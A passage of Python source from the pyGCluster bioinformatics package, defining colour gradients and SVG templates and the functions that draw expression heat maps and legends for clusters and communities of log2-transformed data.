self[ 'Additional labels' ] = {} # will be used as dict in draw functions, i.e. ids
self[ 'Data' ] = None
self[ 'Heat map'] = {
'Params': { 'title' : 'pyGCluster expression map',
'font family' : 'Helvetica',
'font size' : 14 ,
'rBox width' : 40,
'rBox height' : 20,
'left border' : 10,
'top border' : 70, # will be adjusted depending on the labels :)
'text spacing' : 2,
'text width' : 2000,
'separator width': 7,
'min' : None,
'max' : None,
'legend filename': 'legend.svg',
'heat map filename' : 'expression_map.svg',
'default color' : [255, 255, 255],
'color gradient' : 'default',
},
'Color Gradients' : {
'default' : [(-1, (255,40,255)), (-0.40,(255,40,40)), (-0.05,(40,40,40)), (0,(0,0,0)), (+0.05,(40,40,40)), (+0.40,(40,255,40)), (+1,(255,255,40)) ],
'Daniel' : [(-1, (255,0,0)), (-0.01, (0,0,255)), (0, (0,0,0)), (0.01, (255,255,0)), (0.5, (0,255,0)), (1, (0,255,255))],
'barplot' : [(-1, ( 0,0,0)), (0, (0,0,0)), (0.0000001, (255,255,0)), (0.2, (255,0,0)), (1, (120,120,120))],
'1337' : [(-1, (255,0,0)), (-0.5,(255,0,255)), (-0.02,(77,77,77)), (0,(0,0,0)) ,(+0.02,(77,77,77)), (+0.5,(255,255,0)), (+1,(0,255,0)) ],
'BrBG' : [(-1, (166, 97, 26)), (-0.5, (223, 194, 125)), (0, (245, 245, 245)), (+0.5, (128, 205, 193)), (+1, (1, 133, 113)) ],
'PiYG' : [(-1, (208, 28, 139)), (-0.5, (241, 182, 218)), (0, (247, 247, 247)), (+0.5, (184, 225, 134)), (+1, (77, 172, 38)) ],
'PRGn' : [(-1, (123, 50, 148)), (-0.5, (194, 165, 207)), (0, (247, 247, 247)), (+0.5, (166, 219, 160)), (+1, (0, 136, 55)) ],
'PuOr' : [(-1, (230, 97, 1)), (-0.5, (253, 184, 99)), (0, (247, 247, 247)), (+0.5, (178, 171, 210)), (+1, (94, 60, 153)) ],
'RdBu' : [(-1, (202, 0, 32)), (-0.5, (244, 165, 130)), (0, (247, 247, 247)), (+0.5, (146, 197, 222)), (+1, (5, 113, 176)), ],
'RdGy' : [(-1, (202, 0, 32)), (-0.5, (244, 165, 130)), (0, (255, 255, 255)), (+0.5, (186, 186, 186)), (+1, (64, 64, 64)), ],
'RdYlBu' : [(-1, (215, 25, 28)), (-0.5, (253, 174, 97)), (0, (255, 255, 191)), (+0.5, (171, 217, 233)), (+1, (44, 123, 182)), ],
'RdYlGn' : [(-1, (215, 25, 28)), (-0.5, (253, 174, 97)), (0, (255, 255, 191)), (+0.5, (166, 217, 106)), (+1, (26, 150, 65)), ],
'Spectral' : [(-1, (215, 25, 28)), (-0.5, (253, 174, 97)), (0, (255, 255, 191)), (+0.5, (171, 221, 164)), (+1, (43, 131, 186)), ],
'Spectral_up' : [(-1, (215, 25, 28)), (-0.75, (215, 25, 28)), (-0.5, (215, 25, 28)), (-0.25, (215, 25, 28)), (-0.01, (215, 25, 28)), (0, (215, 25, 28)), (+0.01, (215, 25, 28)), (+0.25, (253, 174, 97)), (+0.5, (255, 255, 191)), (+0.75, (171, 221, 164)), (+1, (43, 131, 186)) ],
},
'SVG box styles' : {
'modern' : '''
<g id="rowPos{0}_conPos{1}">
<title>{ratio}±{std} - [{x0}.{y0} w:{width} h:{height}</title>
<rect x="{x0}" y="{y0}" width="{width}" height="{height}" style="fill:rgb({r},{g},{b});fill-opacity:0.2;stroke:white;stroke-width:1;" title="{ratio}±{std}" />
<path d = "M {x0} {y0} L {x3} {y0} L {x2} {y1} L {x1} {y1} L {x1} {y2} L {x0} {y3} L {x0} {y0}" style="fill:rgb({r},{g},{b});stroke:black;stroke-width:1;stroke-opacity:0.0;"/>
<path d = "M {x2} {y2} L {x1} {y2} L {x2} {y1} L {x2} {y2}" style="fill:rgb({r},{g},{b});stroke:black;stroke-width:1;stroke-opacity:0.0;"/>
<path d = "M {x1} {y1} L {x1} {y2} L {x2} {y1} L {x1} {y1}" style="fill:rgb({r},{g},{b}); fill-opacity:0.7; stroke:red;stroke-width:1;stroke-opacity:0.0;"/>
</g>''',
'fusion' : '''
<g id="rowPos{0}_conPos{1}">
                <title>{ratio}±{std} - [{x0},{y0}] w:{width} h:{height}</title>
<rect x="{x0}" y="{y0}" width="{width}" height="{height}" style="fill:rgb({r},{g},{b});fill-opacity:0.7;stroke:white;stroke-width:1;" title="{ratio}±{std}" />
<path d = "M {x0} {y0} L {x3} {y0} L {x2} {y1} L {x1} {y1} L {x1} {y2} L {x0} {y3} L {x0} {y0}" style="fill:rgb({r},{g},{b});stroke:black;stroke-width:1;stroke-opacity:0.0;"/>
<path d = "M {x2} {y2} L {x1} {y2} L {x2} {y1} L {x2} {y2}" style="fill:rgb({r},{g},{b});stroke:black;stroke-width:1;stroke-opacity:0.0;"/>
<path d = "M {x1} {y1} L {x1} {y2} L {x2} {y1} L {x1} {y1}" style="fill:rgb({r},{g},{b}); fill-opacity:0.7; stroke:red;stroke-width:1;stroke-opacity:0.0;"/>
<rect x="{x1}" y="{y1}" width="{widthNew}" height="{heightNew}" style="fill:None;stroke:black;stroke-width:1;" title="{ratio}±{std}" />
</g>''',
'classic' : '''
<g id="rowPos{0}_conPos{1}">
                <title>{ratio}±{std} - [{x0},{y0}] w:{width} h:{height}</title>
<rect x="{x0}" y="{y0}" width="{width}" height="{height}" style="fill:rgb({r},{g},{b});stroke:white;stroke-width:1;" title="{ratio}±{std}" />
<rect x="{x1}" y="{y1}" width="{widthNew}" height="{heightNew}" style="fill:None;stroke:black;stroke-width:1;" title="{ratio}±{std}" />
</g>''',
}
}
# check if data is valid, i.e. contains a value for each condition
data_as_ordered_dict = OrderedDict()
if data != None:
conditions = set()
# determine number of different conditions:
for identifier in data.keys():
for condition in data[ identifier ].keys():
conditions.add(condition)
for identifier in list(data.keys()):
# discard entry if any condition is missing:
missing_conditions = conditions - set( data[ identifier ].keys() )
if len(missing_conditions) > 0:
del data[identifier]
for identifier in sorted( data ):
data_as_ordered_dict[ identifier ] = OrderedDict()
for condition in sorted( data[ identifier ] ):
data_as_ordered_dict[ identifier ][ condition ] = data[ identifier ][ condition ]
self[ 'Conditions' ] = sorted( conditions )
self[ 'Data' ] = data_as_ordered_dict
self[ 'Identifiers' ] = tuple( sorted( data ) )
self[ 'Root size' ] = len( data )
self[ 'Root' ] = tuple( range( self[ 'Root size' ] ) )
if not self.check_if_data_is_log2_transformed():
self._print( '[ WARNING ] there are NO ratios < 0! Is the data log2 transformed?', file=sys.stderr, verbosity_level = 1 )
s = 'pyGCluster initialized with {0} objects among {1} different conditions.'
self._print( s.format( len( data.keys() ), len( conditions ) ), verbosity_level = 1 )
return
def draw_expression_map( self, identifiers = None, data = None, conditions = None, additional_labels = None, min_value_4_expression_map = None, max_value_4_expression_map = None, expression_map_filename = None, legend_filename = None, color_gradient = None , box_style = 'classic' ):
'''
Draws the expression map as an SVG file.
:param min_value_4_expression_map: lower bound for color coding of values in the expression map. Remember that log2-values are expected, i.e. this value should be < 0!
:type min_value_4_expression_map: float
:param max_value_4_expression_map: upper bound for color coding of values in the expression map.
:type max_value_4_expression_map: float
:param color_gradient: name of the color gradient used for plotting the expression map. Currently supported are default, Daniel, barplot, 1337, BrBG, PiYG, PRGn, PuOr, RdBu, RdGy, RdYlBu, RdYlGn and Spectral
:type color_gradient: string
:param expression_map_filename: file name for the expression map. '.svg' will be added if required.
:type expression_map_filename: string
:param legend_filename: file name for the legend. '.svg' will be added if required.
:type legend_filename: string
:param box_style: the way the relative standard deviation is visualized in the expression map. Currently supported are 'modern', 'fusion' or 'classic'.
:type box_style: string
:param additional_labels: dictionary, where additional labels can be defined which will be added in the expression map plots to the gene/protein names
:type additional_labels: dict
:rtype: none
Data has to be a nested dict in the following format:
>>> data = {
... fastaID1 : {
... cond1 : ( mean, sd ) , cond2 : ( mean, sd ), ...
... }
... fastaID2 : {
... cond1 : ( mean, sd ) , cond2 : ( mean, sd ), ...
... }
... }
The parameters identifiers, data and conditions are optional; if they are not given, the corresponding values are taken from
| self[ 'Data' ]
| self[ 'Identifiers' ]
| self[ 'Conditions' ]
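
Example (a minimal usage sketch; "my_cluster" is assumed to be an already
initialized pyGCluster.Cluster instance holding data, and all file names are
placeholders):

>>> my_cluster.draw_expression_map(
...     min_value_4_expression_map = -3,
...     max_value_4_expression_map = 3,
...     expression_map_filename = 'my_expression_map.svg',
...     legend_filename = 'my_legend.svg',
...     color_gradient = 'Spectral',
...     box_style = 'classic'
... )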
'''
if additional_labels is None:
    additional_labels = {}
if data is None:
    # fall back to the data stored in the instance, as described in the docstring
    data = self[ 'Data' ]
if conditions is None:
conditions = set()
for identifier in data.keys():
conditions |= set( data[ identifier ].keys() )
conditions = sorted( list( conditions ) )
if identifiers is None:
if type(data) == type(OrderedDict()):
identifiers = list( data.keys() )
else:
identifiers = sorted(list( data.keys() ))
#
# Updating self[ 'Additional labels' ]
#
if additional_labels != None:
for identifier in additional_labels.keys():
if identifier not in self[ 'Additional labels' ].keys():
self[ 'Additional labels' ][ identifier ] = []
# self[ 'Additional labels' ][ identifier ] += additional_labels[ identifier ]
#
# Updating min/max if required
#
if max_value_4_expression_map != None:
self[ 'Heat map'][ 'Params' ][ 'max' ] = max_value_4_expression_map
if min_value_4_expression_map != None:
self[ 'Heat map'][ 'Params' ][ 'min' ] = min_value_4_expression_map
#
# determine range if needed
#
if self[ 'Heat map'][ 'Params' ][ 'min' ] is None or self[ 'Heat map'][ 'Params' ][ 'max' ] is None:
allValues = []
for identifier in data.keys():
for condition in data[ identifier ].keys():
allValues.append( data[ identifier ][ condition][0] )
if self[ 'Heat map' ][ 'Params' ][ 'min' ] is None:
self[ 'Heat map' ][ 'Params' ][ 'min' ] = math.floor( min( allValues ) )
if self[ 'Heat map' ][ 'Params' ][ 'max' ] is None:
self[ 'Heat map' ][ 'Params' ][ 'max' ] = math.ceil( max( allValues ) )
#
# setting default color gradient if match is found
#
if color_gradient != None:
if color_gradient not in self[ 'Heat map' ][ 'Color Gradients' ].keys():
print('Do not know color gradient {0}, falling back to default'.format( color_gradient ), file = sys.stderr)
color_gradient = 'default'
self[ 'Heat map' ][ 'Params' ][ 'color gradient' ] = color_gradient
#
#
#
if expression_map_filename != None:
self[ 'Heat map'][ 'Params' ][ 'heat map filename' ] = expression_map_filename
if legend_filename != None:
self[ 'Heat map'][ 'Params' ][ 'legend filename' ] = legend_filename
self[ 'Heat map'][ 'Params' ][ 'expression profile filename' ] = self[ 'Heat map'][ 'Params' ][ 'heat map filename' ]+'_expP.svg'
for filename in ['heat map filename', 'legend filename', 'expression profile filename']:
if '.svg' not in self[ 'Heat map'][ 'Params' ][ filename ]:
self[ 'Heat map'][ 'Params' ][ filename ] += '.svg'
#
# recalculate topBorder
#
for pos, line in enumerate( conditions ):
lineHeight = len( line ) * self[ 'Heat map'][ 'Params' ]['font size']
if lineHeight > self[ 'Heat map'][ 'Params' ][ 'top border' ]:
self[ 'Heat map'][ 'Params' ][ 'top border' ] = lineHeight
#
#
#
expProf = {}
assert type(identifiers) == type( [] ) , 'require a list of identifiers!'
# self._draw_expression_map_legend()
svgOut = codecs.open(
os.path.join(
self[ 'Working directory' ],
self[ 'Heat map' ][ 'Params' ]['heat map filename']
),
'w',
'utf-8'
)
svgWidth = len( conditions ) * self[ 'Heat map'][ 'Params' ][ 'rBox width' ] + self[ 'Heat map'][ 'Params' ]['left border'] + self[ 'Heat map'][ 'Params' ]['text width']
svgHeight = len( identifiers ) * self[ 'Heat map'][ 'Params' ][ 'rBox height' ] + self[ 'Heat map'][ 'Params' ]['top border']
number_of_separators = 0
print("""<svg
xmlns="http://www.w3.org/2000/svg"
version="1.1"
preserveAspectRatio="xMinYMin meet"
width="{0}"
height="{1}"
font-size="{font size}px"
font-family="{font family}"
fill="black"
text-anchor="beginning"
baseline-alignment="middle"
>
<title>{title}</title>
""".format(
svgWidth,
svgHeight,
**self[ 'Heat map'][ 'Params' ]
),
file = svgOut
)
#
# write top legend
#
for condPos, condition in enumerate( conditions ):
x = int(self[ 'Heat map'][ 'Params' ][ 'left border' ] + (condPos) * self[ 'Heat map'][ 'Params' ]['rBox width'] + self[ 'Heat map'][ 'Params' ]['rBox width'] / 2.0 )
y = int(self[ 'Heat map'][ 'Params' ][ 'top border' ] - self[ 'Heat map'][ 'Params' ]['text spacing'] )
print( unicode(
' <text x="{0}" y="{1}" text-anchor="left" transform="rotate(-90, {0}, {1})">{2}</text>'.format(
x,
y,
condition
),
errors = 'replace'
),
file = svgOut
)
for rowPos, identifier in enumerate( identifiers ):
adjustedRowPos = rowPos - number_of_separators
if identifier == '_placeholder_':
shapeDict = self._HM_calcShapeAndColor(
x = 0,
y = adjustedRowPos,
ratio = 0,
std = 0,
number_of_separators = number_of_separators,
)
shapeDict['x1_separator'] = shapeDict['x0']
shapeDict['x2_separator'] = shapeDict['x0'] + ( self[ 'Heat map'][ 'Params' ]['rBox width'] * len( conditions ))
print( unicode('''
<line x1="{x1_separator}" y1="{y0}" x2="{x2_separator}" y2="{y0}" style="stroke:rgb{0};stroke-width:{1}"/>
'''.format(
self[ 'Heat map'][ 'Params' ]['default color'],
self[ 'Heat map'][ 'Params' ]['separator width'],
**shapeDict
),
errors = 'replace'
),
file = svgOut
)
number_of_separators += 1
else:
expProf[ identifier ] = [ [] ]
for conPos, condition in enumerate( conditions ):
try:
ratio, std = data[ identifier ][ condition ]
insertion_point = int( len( expProf[ identifier ][ -1 ] ) / 2 )
# first entry in profile
expProf[ identifier ][ -1 ].insert( insertion_point, ratio - std )
expProf[ identifier ][ -1 ].insert( insertion_point, ratio + std )
except:
ratio, std = None, None
expProf[ identifier ].append( [] )
shapeDict = self._HM_calcShapeAndColor(
x = conPos,
y = adjustedRowPos,
ratio = ratio,
std = std,
number_of_separators = number_of_separators,
)
print( unicode( self['Heat map']['SVG box styles'][ box_style ].format(
rowPos,
conPos,
**shapeDict
),
errors = 'replace'
),
file = svgOut
)
#
shapeDict['x_text'] = (conPos + 1 ) * self[ 'Heat map'][ 'Params' ]['rBox width'] + self[ 'Heat map'][ 'Params' ]['left border'] + self[ 'Heat map'][ 'Params' ]['text spacing']
shapeDict['y_text'] = (adjustedRowPos + 0.77) * self[ 'Heat map'][ 'Params' ]['rBox height'] + self[ 'Heat map'][ 'Params' ]['top border'] + (self[ 'Heat map'][ 'Params' ]['separator width'] * number_of_separators)
shapeDict['text'] = ''
shapeDict['text'] += '{0}'.format( identifier )
if identifier in additional_labels.keys():
shapeDict['text'] += ' '.join(additional_labels[ identifier ])
if identifier in self[ 'Additional labels' ].keys():
shapeDict['text'] += ' '.join( self[ 'Additional labels' ][ identifier ])
print( unicode('''
<g id="Text rowPos{0}_conPos{1}">
<title>{ratio}±{std}</title>
<text xml:space='preserve' x="{x_text}" y="{y_text}">{text}</text>
</g>'''.format(
rowPos,
conPos,
**shapeDict
),
errors = 'replace'
),
file = svgOut
)
# eof
print("</svg>", file = svgOut )
svgOut.close()
#
# Drawing legend
#
svgLegendOut = codecs.open(
os.path.join(
self[ 'Working directory' ],
self[ 'Heat map' ][ 'Params' ]['legend filename']
),
'w',
'utf-8'
)
svgWidth = len( conditions ) * self[ 'Heat map'][ 'Params' ][ 'rBox width' ] + self[ 'Heat map'][ 'Params' ]['left border'] + self[ 'Heat map'][ 'Params' ]['text width']
svgHeight = 11 * self[ 'Heat map'][ 'Params' ][ 'rBox height' ] + self[ 'Heat map'][ 'Params' ]['top border']
number_of_separators = 0
print("""<svg
xmlns="http://www.w3.org/2000/svg"
version="1.1"
preserveAspectRatio="xMinYMin meet"
width="{0}"
height="{1}"
font-size="{font size}px"
font-family="{font family}"
fill="black"
text-anchor="beginning"
baseline-alignment="middle"
>
<title>Legend</title>
<text x="{2}" y="{3}" text-anchor="left" transform="rotate(-90, {2}, {3})">ratio</text>
<text x="{4}" y="{3}" text-anchor="left" transform="rotate(-90, {4}, {3})">rel. std</text>
""".format(
svgWidth,
svgHeight,
int(self[ 'Heat map'][ 'Params' ][ 'left border' ] + 2 * self[ 'Heat map'][ 'Params' ]['rBox width'] + self[ 'Heat map'][ 'Params' ]['rBox width'] / 2.0 ),
int(self[ 'Heat map'][ 'Params' ][ 'top border' ] - self[ 'Heat map'][ 'Params' ]['text spacing'] ) - 10,
int(self[ 'Heat map'][ 'Params' ][ 'left border' ] + 3 * self[ 'Heat map'][ 'Params' ]['rBox width'] + self[ 'Heat map'][ 'Params' ]['rBox width'] / 2.0 ),
**self[ 'Heat map'][ 'Params' ]
),
file = svgLegendOut
)
positive_step_size = self[ 'Heat map' ]['Params'][ 'max' ] / 5.0
negative_step_size = self[ 'Heat map' ]['Params'][ 'min' ] / 5.0
number_of_separators = 0
for y in range(0,11):
_ = 5 - y
if _ >= 0:
ratio = positive_step_size * _
else:
ratio = negative_step_size * -1 * _
shapeDict = self._HM_calcShapeAndColor(
x = 2,
y = y,
ratio = ratio,
std = 0.0
)
print( unicode( self['Heat map']['SVG box styles'][ box_style ].format(
y,
2,
**shapeDict
),
errors = 'replace'
),
file = svgLegendOut
)
std = y * 0.1
shapeDict = self._HM_calcShapeAndColor(
x = 3,
y = y,
ratio = 1.0,
std = std
)
shapeDict['r'] = 147
shapeDict['g'] = 147
shapeDict['b'] = 147
print( unicode(self['Heat map']['SVG box styles'][ box_style ].format(
y,
3,
**shapeDict
),
errors = 'replace'
),
file = svgLegendOut
)
shapeDict['x_text_left'] = self[ 'Heat map'][ 'Params' ]['rBox width'] + self[ 'Heat map'][ 'Params' ]['left border'] + self[ 'Heat map'][ 'Params' ]['text spacing']
shapeDict['x_text_right'] = 4 * self[ 'Heat map'][ 'Params' ]['rBox width'] + self[ 'Heat map'][ 'Params' ]['left border'] + self[ 'Heat map'][ 'Params' ]['text spacing']
shapeDict['y_text_left'] = (y + 0.77) * self[ 'Heat map'][ 'Params' ]['rBox height'] + self[ 'Heat map'][ 'Params' ]['top border'] + (self[ 'Heat map'][ 'Params' ]['separator width'] * number_of_separators)
shapeDict['text_left'] = '{0:3.2f}'.format( ratio )
shapeDict['text_right'] = '{0:2.1f}'.format( std )
print( unicode('''
<g id="Legend {0}">
<title>{ratio}±{std}</title>
<text xml:space='preserve' x="{x_text_left}" y="{y_text_left}">{text_left}</text>
<text xml:space='preserve' x="{x_text_right}" y="{y_text_left}">{text_right}</text>
</g>'''.format(
y,
**shapeDict
),
errors = 'replace'
),
file = svgLegendOut
)
print("</svg>", file = svgLegendOut )
svgLegendOut.close()
return
def _HM_calcShapeAndColor(self, x = None, y = None, ratio = None, std = None, number_of_separators = 0):
'''
Internal function to determine shape and color of expression map entries
'''
shapeDict = {}
shapeDict['ratio'] = ratio
shapeDict['std'] = std
shapeDict['r'], shapeDict['g'], shapeDict['b'] = self._HM_visualizeColor( ratio )
shapeDict['x0'] = int(self[ 'Heat map'][ 'Params' ]['left border'] + self[ 'Heat map'][ 'Params' ]['rBox width'] * x)
shapeDict['y0'] = int(self[ 'Heat map'][ 'Params' ]['top border'] + self[ 'Heat map'][ 'Params' ]['rBox height'] * y)
shapeDict['width'] = self[ 'Heat map'][ 'Params' ]['rBox width']
shapeDict['height'] = self[ 'Heat map'][ 'Params' ]['rBox height']
if std != None or (std is None and ratio is None): # or std != 0.0:
if std is None:
# ratio and sd for this entry are None, this will lead to white box
stdAsPercentOfRatio = 0
else:
if ratio == 0.0:
ratio += 0.01
stdAsPercentOfRatio = abs( std / float( ratio ) )
if stdAsPercentOfRatio > 1:
stdAsPercentOfRatio = 1
shapeDict['widthNew'] = int(round( (1 - stdAsPercentOfRatio) * self[ 'Heat map'][ 'Params' ]['rBox width'] ))
shapeDict['heightNew'] = int(round( (1 - stdAsPercentOfRatio) * self[ 'Heat map'][ 'Params' ]['rBox height'] ))
shapeDict['x1'] = int(shapeDict['x0'] + 0.5 * (self[ 'Heat map'][ 'Params' ]['rBox width'] - shapeDict['widthNew']))
shapeDict['y1'] = int(shapeDict['y0'] + 0.5 * (self[ 'Heat map'][ 'Params' ]['rBox height'] - shapeDict['heightNew']))
shapeDict['y0'] += self[ 'Heat map'][ 'Params' ]['separator width'] * number_of_separators
shapeDict['y1'] += self[ 'Heat map'][ 'Params' ]['separator width'] * number_of_separators
shapeDict['height_half'] = shapeDict['height'] / 2.0
shapeDict['y3'] = shapeDict['y0'] + shapeDict['height']
shapeDict['x3'] = shapeDict['x0'] + shapeDict['width']
shapeDict['y2'] = shapeDict['y1'] + shapeDict['heightNew']
shapeDict['x2'] = shapeDict['x1'] + shapeDict['widthNew']
return shapeDict
def _HM_visualizeColor( self, ratio ):
'''
Determines the RGB color for an expression map value by linear interpolation on the selected color gradient.
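
Illustrative walk-through (assuming the 'default' gradient and
self[ 'Heat map' ][ 'Params' ][ 'max' ] = 4): a ratio of +2 is first scaled to
+0.5 on the gradient axis and the returned color is then linearly interpolated
between the anchor points at +0.40 and +1.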
'''
##
color = self[ 'Heat map'][ 'Params' ][ 'default color' ][:]
colorGradient = self[ 'Heat map' ][ 'Color Gradients' ][ self[ 'Heat map' ]['Params']['color gradient'] ]
if ratio != None:
if ratio >= 0:
scaling = self[ 'Heat map' ]['Params'][ 'max' ] / float( colorGradient[-1][0] )
else:
scaling = self[ 'Heat map' ]['Params'][ 'min' ] / float( colorGradient[0][0] )
scaled_ratio = ratio / scaling
idx = bisect.bisect( colorGradient, ( scaled_ratio, ) )
if idx == 0:
color = colorGradient[0][1]
elif idx == len( colorGradient):
color = colorGradient[-1][1]
else:
# linear interpolation ... between idx-1 & idx
dX = ( scaled_ratio - colorGradient[ idx - 1 ][ 0 ] ) / ( colorGradient[ idx ][ 0 ] - colorGradient[ idx - 1 ][ 0 ] )
for color_chanel in range(3):
d_ = dX * ( colorGradient[ idx ][ 1 ][ color_chanel ] - colorGradient[ idx - 1 ][ 1 ][ color_chanel ])
if abs( d_ ) <= sys.float_info.epsilon :
color[ color_chanel ] = int(round( colorGradient[idx - 1][ 1 ][ color_chanel ]))
else:
color[ color_chanel ] = int(round( colorGradient[idx - 1][ 1 ][ color_chanel ] + d_))
return color
def draw_expression_map_for_cluster(self, clusterID = None, cluster = None, filename = None, min_value_4_expression_map = None, max_value_4_expression_map = None, color_gradient = 'default', box_style = 'classic' ):
'''
Plots an expression map for a given cluster.
Either the parameter "clusterID" or "cluster" can be defined.
This function is useful to plot a user-defined cluster, e.g. a knowledge-based cluster (TCA cluster, glycolysis cluster, ...). In this case, the parameter "cluster" should be defined.
:param clusterID: ID of a cluster (those are obtained e.g. from the plot of cluster frequencies or the node map)
:type clusterID: int
:param cluster: tuple containing the indices of the objects describing a cluster.
:type cluster: tuple
:param filename: name of the SVG file for the expression map.
:type filename: string
The following parameters are passed to :py:func:`pyGCluster.Cluster.draw_expression_map`:
:param min_value_4_expression_map: lower bound for color coding of values in the expression map. Remember that log2-values are expected, i.e. this value should be < 0!
:type min_value_4_expression_map: float
:param max_value_4_expression_map: upper bound for color coding of values in the expression map.
:type max_value_4_expression_map: float
:param color_gradient: name of the color gradient used for plotting the expression map. Currently supported are default, Daniel, barplot, 1337, BrBG, PiYG, PRGn, PuOr, RdBu, RdGy, RdYlBu, RdYlGn and Spectral
:type color_gradient: string
:param box_style: name of box style used in SVG. Currently supported are classic, modern, fusion.
:type box_style: string
:rtype: none
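
Example (sketch; assumes that the re-sampling routine has already been run so
that self[ 'Cluster 2 clusterID' ] is populated, and that a cluster with ID 42
exists - the ID is purely illustrative):

>>> my_cluster.draw_expression_map_for_cluster(
...     clusterID = 42,
...     filename = 'cluster_42.svg',
...     color_gradient = 'default',
...     box_style = 'fusion'
... )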
'''
# check if function call was valid:
if clusterID is None and cluster is None:
self._print( '[ ERROR ] call function "draw_expression_map_for_cluster" with either a clusterID or a cluster.', verbosity_level = 0 )
return
elif clusterID != None and cluster != None:
self._print( '[ ERROR ] call function "draw_expression_map_for_cluster" with either a clusterID or a cluster.', verbosity_level = 0 )
return
# if clusterID is given, get the corresponding cluster:
elif clusterID != None:
for c, cID in self[ 'Cluster 2 clusterID' ].items():
if cID == clusterID:
break
cluster = c
# determine hm_filename:
if filename is None:
filename = '{0}.svg'.format( self[ 'Cluster 2 clusterID' ][ cluster ] )
hm_filename = os.path.join( self[ 'Working directory' ], filename )
# prepare for drawing of expression map ...
identifiers = []
data = {}
additional_labels = {}
try:
cFreq, cFreqDict = self.frequencies( cluster = cluster )
except KeyError:
cFreq = 0.0
for index in cluster:
identifier = self[ 'Identifiers' ][ index ]
identifiers.append( identifier )
data[ identifier ] = {}
for condition in self[ 'Conditions' ]:
data[ identifier ][ condition ] = self[ 'Data' ][ identifier ][ condition ]
additional_labels[ identifier ] = [ '{0:3.4f}'.format( cFreq ) ]
self.draw_expression_map(
identifiers = identifiers,
data = data,
conditions = self[ 'Conditions' ],
additional_labels = additional_labels,
min_value_4_expression_map = min_value_4_expression_map,
max_value_4_expression_map = max_value_4_expression_map,
expression_map_filename = hm_filename,
legend_filename = None,
color_gradient = color_gradient,
box_style = box_style
)
self._print( '... expression map saved as "{0}".'.format( hm_filename ), verbosity_level = 1 )
return
def draw_expression_map_for_community_cluster(self, name, min_value_4_expression_map = None, max_value_4_expression_map = None, color_gradient = '1337', sub_folder = None, min_obcofreq_2_plot = None, box_style = 'classic'):
'''
Plots the expression map for a given "community cluster":
Any cluster in the community node map is internally represented as a tuple with two elements:
"cluster" and "level". Those objects are stored as keys in self[ 'Communities' ],
from where they may be extracted and fed into this function.
:param name: "community cluster" -> best obtain from self[ 'Communities' ].keys()
:type name: tuple
:param min_obcofreq_2_plot: minimum obCoFreq of a cluster's object to be shown in the expression map.
:type min_obcofreq_2_plot: float
The following parameters are passed to :py:func:`pyGCluster.Cluster.draw_expression_map`:
:param min_value_4_expression_map: lower bound for color coding of values in the expression map. Remember that log2-values are expected, i.e. this value should be < 0!
:type min_value_4_expression_map: float
:param max_value_4_expression_map: upper bound for color coding of values in the expression map.
:type max_value_4_expression_map: float
:param color_gradient: name of the color gradient used for plotting the expression map. Currently supported are default, Daniel, barplot, 1337, BrBG, PiYG, PRGn, PuOr, RdBu, RdGy, RdYlBu, RdYlGn and Spectral
:type color_gradient: string
:param box_style: name of box style used in SVG. Currently supported are classic, modern, fusion.
:type box_style: string
:param sub_folder: if specified, the expression map is saved in this folder, rather than in pyGCluster's working directory.
:type sub_folder: string
:rtype: none
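
Example (sketch; community detection must have been performed so that
self[ 'Communities' ] is filled - the chosen key is arbitrary):

>>> name = list( my_cluster[ 'Communities' ].keys() )[ 0 ]
>>> my_cluster.draw_expression_map_for_community_cluster(
...     name,
...     min_obcofreq_2_plot = 0.1,
...     sub_folder = 'communities'
... )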
'''
identifiers = []
data = {}
additional_labels = {}
for index in self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ]:
identifier = None
if index > 0:
normalized_obCoFreq = self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ][ index ]
if normalized_obCoFreq < min_obcofreq_2_plot:
continue
identifier = self[ 'Identifiers' ][ index ]
identifiers.append( identifier )
data[ identifier ] = {}
for condition in self[ 'Conditions' ]:
data[ identifier ][ condition ] = self[ 'Data' ][ identifier ][ condition ]
additional_labels[ identifier ] = [ '{0:3.4f}'.format( normalized_obCoFreq ) ]
else:
identifiers.append( '_placeholder_' )
hm_filename = '{0}-{1}.svg'.format( self[ 'Communities' ][ name ][ 'cluster ID' ], name[ 1 ] )
if sub_folder != None:
if not os.path.exists( os.path.join( self[ 'Working directory' ], sub_folder ) ):
os.mkdir( os.path.join( self[ 'Working directory' ], sub_folder ) )
hm_filename = os.path.join( sub_folder , hm_filename )
self.draw_expression_map(
identifiers = identifiers,
data = data,
conditions = self[ 'Conditions' ],
additional_labels = additional_labels,
min_value_4_expression_map = min_value_4_expression_map,
max_value_4_expression_map = max_value_4_expression_map,
expression_map_filename = hm_filename,
legend_filename = None,
color_gradient = color_gradient,
box_style = box_style
)
return
def draw_community_expression_maps(self, min_value_4_expression_map = None, max_value_4_expression_map = None, color_gradient = 'default', box_style = 'classic', conditions= None, additional_labels=None):
'''
Plots the expression map for each community showing its object composition.
The following parameters are passed to :py:func:`pyGCluster.Cluster.draw_expression_map`:
:param min_value_4_expression_map: lower bound for color coding of values in the expression map. Remember that log2-values are expected, i.e. this value should be < 0!
:type min_value_4_expression_map: float
:param max_value_4_expression_map: upper bound for color coding of values in the expression map.
:type max_value_4_expression_map: float
:param color_gradient: name of the color gradient used for plotting the expression map. Currently supported are default, Daniel, barplot, 1337, BrBG, PiYG, PRGn, PuOr, RdBu, RdGy, RdYlBu, RdYlGn and Spectral
:type color_gradient: string
:param box_style: name of box style used in SVG. Currently supported are classic, modern, fusion.
:type box_style: string
:param additional_labels: dict with additional labels, k = identifier and v = list of additional labels.
:type additional_labels: dict
:rtype: none
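
Example (sketch, assuming the community structure has already been built):

>>> my_cluster.draw_community_expression_maps(
...     min_value_4_expression_map = -3,
...     max_value_4_expression_map = 3,
...     color_gradient = '1337'
... )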
'''
if conditions is None:
conditions = self[ 'Conditions' ]
max_level = max( [ name[ 1 ] for name in self[ 'Communities' ] ] )
for cluster in self._get_levelX_clusters( level = max_level ):
name = ( cluster, max_level )
if len( cluster ) > self[ 'for IO skip clusters bigger than' ]:
continue
identifiers = []
data = {}
internal_additional_labels = {}
for index in self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ].keys():
identifier = None
if index > 0:
# try:
identifier = self[ 'Identifiers' ][ index ]
# except:
# print( index , self[ 'Communities' ][ name ])
# print( list( self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ].keys() ) )
# print('Tried to access Identifier # {0} and failed'.format( index ) )
# print('Total length of Identifiers is {0}'.format( len( self[ 'Identifiers' ] )))
# # for index in self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ].keys():
# # print( index )
